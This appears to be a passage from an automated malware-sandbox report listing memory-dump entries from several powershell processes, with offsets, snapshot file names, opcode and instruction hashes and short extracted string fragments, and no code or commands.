• Instruction Fuzzy Hash: 9A219132E4DE864FF3A9DB1C945117866E2FF65390B6902BAC01FE71ABDE18DC44C251
Memory Dump Source
• Source File: 00000005.00000002.1569089356.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff887df0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05c6090ab7b4ff1b2d85518873fa2db63e27e1f5acb51df00b210ee0d628b256
• Instruction ID: a3aa5ef4527e8569930711755993f912fbf59a5ee64efa92f23adf82548159ad
• Opcode Fuzzy Hash: 05c6090ab7b4ff1b2d85518873fa2db63e27e1f5acb51df00b210ee0d628b256
• Instruction Fuzzy Hash: 1A112532D8D5854FE7A5E72894505BC77F1FF402A075902FAC41EE719BDA19AC44C341
Memory Dump Source
• Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction ID: ca7c1ec659b9d5d66912b6f2aa4395e217a420b6faa3559ab1425feb945c1899
• Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: 8101677115CB0C4FD744EF0CE451AA9B7E0FB95364F10056DE58AC3665DA36E882CB46
Memory Dump Source
• Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23ba0bf10e5b80141f8455d0ca4ec8c8f6a29645d5d9ff11d122309888ea5ecf
• Instruction ID: 4323da222518d1f5a47f1e41075e06e97cd60def85635519eb5d1135a44b5c78
• Opcode Fuzzy Hash: 23ba0bf10e5b80141f8455d0ca4ec8c8f6a29645d5d9ff11d122309888ea5ecf
• Instruction Fuzzy Hash: E9F0FC76A9998C4FD743DF1CDC550E87FA0FFE5211B0402A7D809C7052FA255816C7C1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^4$M_^5$M_^@$M_^N$M_^U$M_^Y
• API String ID: 0-3990506085
• Opcode ID: 0f6c3e6c5954c76065486b9d972ee69299aecac023412943f1e424693a7cc32b
• Instruction ID: 09c352572252b6c098239c821429f0f93a358d74b85d38a35d6af8c131691f16
• Opcode Fuzzy Hash: 0f6c3e6c5954c76065486b9d972ee69299aecac023412943f1e424693a7cc32b
• Instruction Fuzzy Hash: EC313B67B08529CA820136BCF8416EC7790DF9637678547F7D1A9CF083ED19348B86E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
Similarity
• API ID:
• String ID: d6$@J_$]$p@s$x._
• API String ID: 0-2524536879
• Opcode ID: c4417230c153b7bf816b6614510ab5752a6eb3093aab44474522095338d6e622
• Instruction ID: 0bb4cbc2edf64edf62ff83795431f7aa6ebab671d0449b32afbf01ad6f429c02
• Opcode Fuzzy Hash: c4417230c153b7bf816b6614510ab5752a6eb3093aab44474522095338d6e622
• Instruction Fuzzy Hash: 3551F462C9EAC14FF2164AB8281517D6EB1FF52A4079881BBC0994B0DFEA4CBD1AC345
Strings
Memory Dump Source
• Source File: 00000005.00000002.1568454480.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff887d20000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^$M_^
• API String ID: 0-679677686
• Opcode ID: fd93bf6aeb917c60bed8f9183ede6dbcce212740ba3996869701adde282f65ed
• Instruction ID: 6beff539052d9ea9c7f5e174a9035a17e0587e2e3d105f29892a4914a6b00865
• Opcode Fuzzy Hash: fd93bf6aeb917c60bed8f9183ede6dbcce212740ba3996869701adde282f65ed
• Instruction Fuzzy Hash: CB3181A3A5D9D34FE39B822849A50A97FA1FF6229871D43F6C089CF4D7FD186803C151
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID: hr
• API String ID: 0-2122794360
• Opcode ID: 09d400f721624c6edf50540d3ba21d2262fd3586f3b096393646c1c5b2f9ca5d
• Instruction ID: 02451c6a73afbf65b7b3e863ef4494a6e8463c7437ad2d24539bc9ccdfe958f1
• Opcode Fuzzy Hash: 09d400f721624c6edf50540d3ba21d2262fd3586f3b096393646c1c5b2f9ca5d
• Instruction Fuzzy Hash: 1F714C32A0CB864FD305DB2C98D56E97B60FF92225F0942BBD45D8B183EF18645AC7A1
Memory Dump Source
• Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 463447f875c86bf608627d855765143d3695e663c692ad0fb7152a83458bd5a1
• Instruction ID: 05136bb7516ab4f6a6849aefb15a1138c10ed0529a87efc88cb04d05d65c3485
• Opcode Fuzzy Hash: 463447f875c86bf608627d855765143d3695e663c692ad0fb7152a83458bd5a1
• Instruction Fuzzy Hash: CED11421D4DACA9FE7659BA848155B97FF1FF16390B0802FEE44EC70D7DA18A805C381
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1e9bd1c64b858123c81fe3f9d1cf0d1a4dbdd7781fb4290009264ec373dc3a3
• Instruction ID: a019c9338b7d3663f5bfab39f90f2767be5a4e5979c47653778574d7ddaf9cd1
• Opcode Fuzzy Hash: c1e9bd1c64b858123c81fe3f9d1cf0d1a4dbdd7781fb4290009264ec373dc3a3
• Instruction Fuzzy Hash: 5D71F777E4D9964FE343962D9C660ED3B70FFA2265B0802B3C49A8B097FE14581B8691
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b387820537fcc020c723053737dbf66b7abb2be0ac1b7eff7a8da36e0fe2452c
• Instruction ID: 71fe4a9ce3dec0f72e589edbd0d1ee05e3f9145bf1a450d16ccac8ad38c23a60
• Opcode Fuzzy Hash: b387820537fcc020c723053737dbf66b7abb2be0ac1b7eff7a8da36e0fe2452c
• Instruction Fuzzy Hash: 5851233090CB854FD34ADB28C855964BBF0FF96354B1805EED4CAC71A7DA29A847C742
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 631d3acbc35c86244fd645668b4961fd2947b405ff79b35acd47ed16d9b9e073
• Instruction ID: f1cda100c55a481a5d1695a67bc1dc9762b3ea37d403d908dfe13a658c1e44ae
• Opcode Fuzzy Hash: 631d3acbc35c86244fd645668b4961fd2947b405ff79b35acd47ed16d9b9e073
• Instruction Fuzzy Hash: C0412477E48D974EE243962C9C550EC3B70FFE13A2B0802B3C05A9B0DBFB15581B9691
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c201af69dd9eacb02a2bec733d6237fa8947b1639d04f5aa2670ed00fc204454
• Instruction ID: 753f1542e8ff7fc918043a1ed7958bfe95cf783ee9f1adbba5a828565e671c28
• Opcode Fuzzy Hash: c201af69dd9eacb02a2bec733d6237fa8947b1639d04f5aa2670ed00fc204454
• Instruction Fuzzy Hash: 46410A71D0CA488FEB589F5CA80A6FD7BE0FBA5711F40422FE44993256DB20A856C7C2
Memory Dump Source
• Source File: 0000000A.00000002.1712072141.00007FF887BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887bed000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3acb2d3e337ae25234ff2fc3901789e1952fc4fb901c1b9b5255944da5fdc764
• Instruction ID: 61f45415c10cd6d0c34d50c892d7cbe0c651825852fe16d779ccd835e849623b
• Opcode Fuzzy Hash: 3acb2d3e337ae25234ff2fc3901789e1952fc4fb901c1b9b5255944da5fdc764
• Instruction Fuzzy Hash: 5941253140DBC44FE7568B3898419563FF0FF52320F1506EFD088CB2A3D625A84AC7A2
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
• Instruction ID: 52d07649515830b02c27e4596541d7ed9f74d4c37e56c1cb3026905bdc575559
• Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
• Instruction Fuzzy Hash: 8F01677115CB0C4FD744EF0CE451AA9B7E0FB95364F10056DE58AC3655DA36E882CB46
Memory Dump Source
• Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e1e4eb6944613d587957b3b1929ed27bc961a3e89a670bdecada314c2a9c860
• Instruction ID: 7449f1d2d4501bc745917af1b253de8a2f86b1814d69fe50bc2e29d87887423b
• Opcode Fuzzy Hash: 9e1e4eb6944613d587957b3b1929ed27bc961a3e89a670bdecada314c2a9c860
• Instruction Fuzzy Hash: B1F0BE32A4C6448FD698EB8CE8015A877F0FF54360B2500BAE06EC71A7CA2AEC45C751
Memory Dump Source
• Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e7574c3eb91906f658b085e813a4a5c451982520076ad4aa586a4175409e7e3
• Instruction ID: a530e1bb594dce351c66b666605534aa37d11e6767dcc86943a3101dd677ff5a
• Opcode Fuzzy Hash: 0e7574c3eb91906f658b085e813a4a5c451982520076ad4aa586a4175409e7e3
• Instruction Fuzzy Hash: C0F0BE31A8C5488FD794EA8CE4595A877F0FF0432071500B6E45AC7067DA2AAC95C740
Memory Dump Source
• Source File: 0000000A.00000002.1713947411.00007FF887DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887dd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
• Instruction ID: 16fc3ff5604b0b436fe1dd69d646a73ea909bafb470d101bfd4f32b01d0daa5c
• Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
• Instruction Fuzzy Hash: 52E01A31B4C8089FDAA8DB0CE0409AD77E1FB9837172102B7D14EC7567CA22EC51CB90
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID: dA$@J_$]$p@s$x._
• API String ID: 0-76705859
• Opcode ID: e21fcbd1cb9628866adf2999e332cff973f84b821b3eb630bf89769ccd87ef6d
• Instruction ID: a170c0f3298134ceb47e62ea3390c760566a5c2199eedba0d7030407f3fd77c4
• Opcode Fuzzy Hash: e21fcbd1cb9628866adf2999e332cff973f84b821b3eb630bf89769ccd87ef6d
• Instruction Fuzzy Hash: CB61F252C8EAC16FF21746B8381417D6EB0FF52A90B9841FBC09D8B0DFE849AD59C346
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
Similarity
• API ID:
• String ID: O_^4$O_^7$O_^F$O_^J
• API String ID: 0-875994666
• Opcode ID: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
• Instruction ID: 8a02a64b9c8484de9747972bc78f4952c54ec0a8a618b9d31cc382a58a81af1e
• Opcode Fuzzy Hash: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                                                      • Instruction Fuzzy Hash: 7E210777A18125CED2417BBDB8046DD3740CFD627634542B2D1AE8F243EA18748786A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X7=Y
                                                                                                      • API String ID: 0-1988537002
                                                                                                      • Opcode ID: d3ed4d12b8fd54793e6ce3e89f1de95a9214bd151e62d24ccc070b7b09926864
                                                                                                      • Instruction ID: 03af6bcc063c3173583dbf45874a137dc1bcbb6bca3e601f5bb6d4f255604e23
                                                                                                      • Opcode Fuzzy Hash: d3ed4d12b8fd54793e6ce3e89f1de95a9214bd151e62d24ccc070b7b09926864
                                                                                                      • Instruction Fuzzy Hash: 20C10231D4DA8A8FE764EF6898196BD7BE1FF56B94B0801BED40DCB093DA1CA805C351
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 485288a6cc4eae241c14e51c3cfda6dc307b54d16a3d0b2a06fae65bb68936fd
                                                                                                      • Instruction ID: 61107392608efa55f3f13ded906bc038cf26b0e2e1afd295e5a568c6d51654e4
                                                                                                      • Opcode Fuzzy Hash: 485288a6cc4eae241c14e51c3cfda6dc307b54d16a3d0b2a06fae65bb68936fd
                                                                                                      • Instruction Fuzzy Hash: 8E412B32E4CA8A4FE7A5D66CA4516BC77E1FF47BA0B0811BAC05DC7587EA1CAC15C381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1d005c54f4c195854b00913de905d9e5777987fbdf2fb0e2102d61a85094050
                                                                                                      • Instruction ID: 6b50cb15bd92b8344bac501713a10156bad32c89b427764cf409a30ced5b46c3
                                                                                                      • Opcode Fuzzy Hash: e1d005c54f4c195854b00913de905d9e5777987fbdf2fb0e2102d61a85094050
                                                                                                      • Instruction Fuzzy Hash: FA31E97191CB884FEB18DF5C9C066A97BF0FBA5311F00426FE449D3292DA70A855CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1928535202.00007FF887C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887c1d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d6aee4d0b45cfba059ab33bb43af445d1f472a468246ffaaae9d14d71ab5d85
                                                                                                      • Instruction ID: 4f462bc28425aba8ab2a173c217c8855f3cefd74e74232831b5e585813a75f94
                                                                                                      • Opcode Fuzzy Hash: 9d6aee4d0b45cfba059ab33bb43af445d1f472a468246ffaaae9d14d71ab5d85
                                                                                                      • Instruction Fuzzy Hash: CA41227080DBC45FE7568B38D845A523FF1EF57260B0901EFD488CB1A3D629A84AC7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3feef2b1fd4b909a6bebf6242baf9645022908825a80d8f9ea13acfc67a1578e
                                                                                                      • Instruction ID: 4ec79f323a1794536f889264b194f5cbc010226ae1fbc5154efee7e2213218c1
                                                                                                      • Opcode Fuzzy Hash: 3feef2b1fd4b909a6bebf6242baf9645022908825a80d8f9ea13acfc67a1578e
                                                                                                      • Instruction Fuzzy Hash: 4A31083190CB8C4FEB59DBA89C496E97FF0EBA6320F0441AFD049C7193E664584ACB52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ca01d15569361e26dd4839136191a736590c68b67d0068b21ac74de5f863d01a
                                                                                                      • Instruction ID: dfeb644823665824326beab636b342a23a5e13c5177433d9a9eefab6836888bd
                                                                                                      • Opcode Fuzzy Hash: ca01d15569361e26dd4839136191a736590c68b67d0068b21ac74de5f863d01a
                                                                                                      • Instruction Fuzzy Hash: 5F11E332D4D6864FE3A5EA6895505BC76E1FF43AA1B5910BAD01DC7497EA1CAC10C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: 00939e82c87dace164199d7fdabe4939007464bef50cb10c5f43c6540cefc411
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: 7501A73110CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3655DA36E882CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b84cd44cf7333970cdd21c3d6f7d8ed66000295c49c84f6196fa4e2974771ca6
                                                                                                      • Instruction ID: 03633fbc2feaf75581047f06da4ffe45a14394a27ed9087609dfea7da7ee0d99
                                                                                                      • Opcode Fuzzy Hash: b84cd44cf7333970cdd21c3d6f7d8ed66000295c49c84f6196fa4e2974771ca6
                                                                                                      • Instruction Fuzzy Hash: 8EF0FC76689E894FD742DB1CDC550E87FB0FFA6241B0801ABE049C71A2FB219808C7D1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d7d84ea19eb2ab7f37d6d0dc5e767be04d12d24bfcaa30f1da57739c181f02a7
                                                                                                      • Instruction ID: b47ce9d8cac8afa31e2310efe941b529483b8dca094dca90c4fa0b1faeb78c63
                                                                                                      • Opcode Fuzzy Hash: d7d84ea19eb2ab7f37d6d0dc5e767be04d12d24bfcaa30f1da57739c181f02a7
                                                                                                      • Instruction Fuzzy Hash: D7F02232A0C5858FE355EA5CE9404A877F0FF5676072500FAD05CC7063CA39AC51C740
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: 389eef69e47aaf2397c4d42e4ea33376506c8ba95024dfde57af40aadd18df55
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: 89E01A31B4C8099FDA68DA0CE1409AD73E1FB9A36176101BBD14EC7962CA26EC51CB80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                                                      • API String ID: 0-1415242001
                                                                                                      • Opcode ID: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                                                      • Instruction ID: 1a1c60fc0dce112cb5376a3b506576867e2fd9fb33b3f251d3f876ce1ae02fc9
                                                                                                      • Opcode Fuzzy Hash: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                                                      • Instruction Fuzzy Hash: A721D773A045158AC24136ADB8416ED7780DF563B834591F3E229CF513DF28A88B8AA1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (0_$8,_$H1_$P/_$xFs$-_$/_
                                                                                                      • API String ID: 0-1052977982
                                                                                                      • Opcode ID: e1754a6bdc57620878b0fc4d7d50dcdfb79816f3b1d2d9cd921aba9a354ad841
                                                                                                      • Instruction ID: c056147ee74d41996ca604b26b498a6a2c6448ce6b238c1a85c1e04eecab0eea
                                                                                                      • Opcode Fuzzy Hash: e1754a6bdc57620878b0fc4d7d50dcdfb79816f3b1d2d9cd921aba9a354ad841
                                                                                                      • Instruction Fuzzy Hash: F261C852D4E9C39FF35646B81C1617DAFB2BF12650B4C42BBC0A9470DBFA099D19C391
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dA$@J_$]$p@s$x._
                                                                                                      • API String ID: 0-76705859
                                                                                                      • Opcode ID: a62cf580675e2175cf5ede6b314d42ce2de68a05b61b12053b4d32f6138b201c
                                                                                                      • Instruction ID: 18b59771d1fa254d35d1a4fcf8c45af8c75b32cd411e5f21e8e832f6ef89831f
                                                                                                      • Opcode Fuzzy Hash: a62cf580675e2175cf5ede6b314d42ce2de68a05b61b12053b4d32f6138b201c
                                                                                                      • Instruction Fuzzy Hash: 0271F562D4EAC24FF35646AC28191BC7E72BF12680B9841FBC0994B1DFF949DD19C341